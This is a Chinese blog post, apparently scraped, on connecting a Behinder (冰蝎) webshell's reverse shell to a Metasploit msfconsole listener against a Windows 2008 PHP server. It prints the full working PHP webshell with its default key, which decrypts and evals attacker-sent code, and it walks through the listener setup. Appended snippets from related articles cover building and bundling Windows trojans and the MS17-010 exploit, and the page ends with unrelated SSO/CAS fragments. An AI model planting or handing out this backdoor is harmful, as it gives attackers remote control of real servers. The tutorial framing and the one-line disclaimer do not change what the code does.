冰蝎下的反弹shell连接msfconsole

article/2025/9/29 13:05:58

文章目录

  • 前言
  • 一、使用木马getshell
    • 1.搭建环境
  • 二、冰蝎配置
  • 三、kali监听
  • 总结


前言

好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。

一、使用木马getshell

冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。在这里插入图片描述
这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就应该这样操作。因为手底下没有现成的webshell。我就去网上找了那些一句话木马,或者可以绕过waf的木马。尝试都无果。后来看了一篇关于冰蝎反弹shell的文章。文章中介绍的是本地环境问题,将PHP的版本改到7.0以上就可以执行了。尝试无果。经过尝试发现冰蝎的脚本得使用对应版本的shell。之前都是一套下载使用的没怎么注意,这次掉坑了。

1.搭建环境

  • 靶机:win 2008
  • 环境:phpstudy 2016
  • 冰蝎:v3.0
    在这里插入图片描述
    因为本地测试,文章以反弹shell为主,就直接将shell拖到服务器了。这里挂一下3.0中PHP的一句话代码。
<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

有兴趣的可以研究一下代码。

二、冰蝎配置

  1. 新建shell,点击保存
    在这里插入图片描述
  2. 进入反弹shell配置界面
    在这里插入图片描述
  3. 选择Meterpreter功能
    在这里插入图片描述
  4. 根据冰蝎的温馨提示,使用kali进行监听就行了。

三、kali监听

我这里Mac上装了msfconsole就直接来演示了

  1. 启动msf
    在这里插入图片描述
  2. 使用exp
    在这里插入图片描述
  3. 设置payload
    在这里插入图片描述
  4. 查看设置
    在这里插入图片描述
  5. 配置本机地址和监听端口
    在这里插入图片描述
  6. 开始监听
    在这里插入图片描述
  7. 冰蝎发送数据建立连接
    在这里插入图片描述
  8. 执行命令
    在这里插入图片描述

总结

总的来说跟用msf生成exe木马,监听木马一样的流程。只不过这里的冰蝎代替了exe来执行。文中有几处不太坚定的答案。还希望好心的大佬给出确定的解答。初级工具使用,仅用于基础信息防御交流,请勿用于其他用途。


http://chatgpt.dhexx.cn/article/2oVRFaAw.shtml

相关文章

Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)

1、控制Metasploit终端&#xff08;MSFCONSOLE&#xff09; MSFCONSOLE主要用于管理Metasploit数据库&#xff0c;管理会话&#xff0c;配置并启动Matasploit模块 一些通用命令&#xff1a; help&#xff1a;该命令允许用户查看执行命令的帮助信息 use module&#xff1a;该命令…

Windows上安装Metasploit-(msfconsole)

前言 平时使用metasploit一般是在kali里面&#xff0c;有时候使用非常的麻烦&#xff0c;其实Metasploit也是支持Windows的&#xff0c;关于很多metasploit的方法&#xff0c;作者觉得有点小麻烦&#xff0c;这里给大家带来一种最简单的方法。 任务一 下载metasploit metasplo…

msfconsole之制作windows木马并成功获取shell

msfconsole之制作windows木马并成功获取shell 一、工具简介     msfconsole 简称 msf 是一款常用的安全测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种木马&#xff0c;其提供了一个一体化的集中控制台&#xff0c;通过msfconsole&#xff0c;你可以访问和使用所…

msfconsole使用手册

我使用ubuntu&#xff1b;在同一局域网内有一台运行Windows XP&#xff08;192.168.0.108&#xff09;的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole&#xff1a; # msfconsole选择一个漏洞&#xff1a; msf > search platform: windows…

msfvenom msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

文章目录 一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式 三、msfconsole控制感染对象Ⅰ、电脑端示例&#xff1a;shell获取Windows的CMDⅡ、移动端示例&#xff1a;webcam_stream获取Android摄像头实时画面 完 免责声明&#xff1a;本文章仅供网…

kali中安装使用msfconsole

在kali中执行msfconsole&#xff0c;显示没有这个命令 安装metasploit-framework框架 启动数据库 service postgresql start # 启动数据库 初始化msf数据库 启动msfconsole 成功&#xff01;&#xff01;&#xff01;

metasploit中msfconsole使用教程,永恒之蓝漏洞复现

文章目录 前言msfconsole常用参数打开和关闭search 查找模块use 使用指定模块info 查看模块的详细信息show 查看&#xff0c;set设置run 和 exploit mf17-010(永恒之蓝)漏洞复现 前言 msfconsole是metasploit中的一个工具&#xff0c;msfconsole集成了很多漏洞的利用的脚本&am…

msfconsole理论

msfconsole理论 msfconsole理论 ‍‍ 在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习&#xff0c;但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfcon…

msfconsole捆绑木马

捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.0.108 …

msfconsole 控制台使用和操作

Msfconsole提供了一个一体化的集中控制台。通过msfconsole&#xff0c;你可以访问和使用所有的metasploit的插件&#xff0c;payload&#xff0c;利用模块&#xff0c;post模块等等。Msfconsole还有第三方程序的接口&#xff0c;比如nmap&#xff0c;sqlmap等&#xff0c;可以直…

Msfconsole的基本使用

WIN XP ms12_020 复现 msfconsolesearch 查找模块use 装载模块winxp ip &#xff1a;192.168.186.133set RHOST 设置目标主机run 执行攻击目标蓝屏死机 重启常用命令show exploits 列出metasploit框架中的所有渗透攻击模块show payloads 列出metasploit框架中的所有攻击载荷sh…

metasploit msfconsole 命令参数

在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习&#xff0c;但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole&#xff0c;你可以访问和使用所有…

使用msfconsole常见问题解决

问题总结&#xff1a; &#xff08;其中有我遇到的问题&#xff0c;有我没有遇到的&#xff0c;但我这里总结了一下别人遇到的&#xff0c;未雨绸缪&#xff09;问题一&#xff08;这个我也遇到过&#xff0c;不过我安装了上面的win 32就没问题了&#xff09;&#xff1a;原因…

msfconsole的简单使用

文章目录 前言一、入侵步骤ps之后通过学习了解了内网穿透 二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架&#xff08;MSF3.4&#xff09;包含3功能模块&#xff1a;msfconsole、msfweb、msfupdate。msfupdat…

msfconsole的使用,MSF17-010(虚拟机)的实验

一.介绍永恒之蓝: 二.环境 宿主机kali: IP地址 靶机win7: IP地址 然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通. 三.msfconsole的使用 1.输入命令msfconslole使用msf框架 2.search MSF17-010 搜索相关脚本 …

【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

目录 一、简介&#xff1a; 二、下载&#xff1a; 2.1、kali 2.2、官网&#xff1a; 2.3、GitHub&#xff1a; 三、启动方法 四、msf常用基础命令 五、msf结构 六、 核心命令&#xff1a; 一、简介&#xff1a; 很容易地获取、开发并对计算机软件漏洞实施攻击 附带数百…

kali msfconsole命令详解以及靶机攻破实战

一.msfconsole介绍 msfconsole简称msf是一款常用的渗透测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种渗透文件&#xff0c;利用网站&#xff0c;手机等的漏洞将到目标靶机&#xff0c;操控目标靶机…这边仅供学习使用 msfconsole注&#xff1a;默认kali 预装了met…

内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

Msfconsole工具 概括&#xff1a; Msfconsole简称&#xff08;msf&#xff09;是一款常用的渗透测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种木马&#xff0c;方便于安全测试人员的使用. 目录&#xff1a; Msfconsole的使用&#xff1a; 第一步&#xff1a;进行端…

SSO是什么?CAS是什么?

SSO SSO是目前比较流行的服务于企业业务整合的解决方案之一&#xff0c; SSO 使得在多个应用系统中&#xff0c;用户只需要 登录一次 就可以访问所有相互信任的应用系统。 CAS CAS 是 Yale 大学发起的一个企业级的、开源的项目&#xff0c;旨在为 Web 应用系统提供一种可靠的…

什么是CAS?

CAS 是 Yale &#xff08;耶鲁&#xff09;大学发起的一个开源项目&#xff0c;旨在为 Web 应用系统提供一种可靠的单点登录方法&#xff0c;CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目。CAS 具有以下特点&#xff1a; 【1】开源的企业级单点登录解决方案。 【2】CAS S…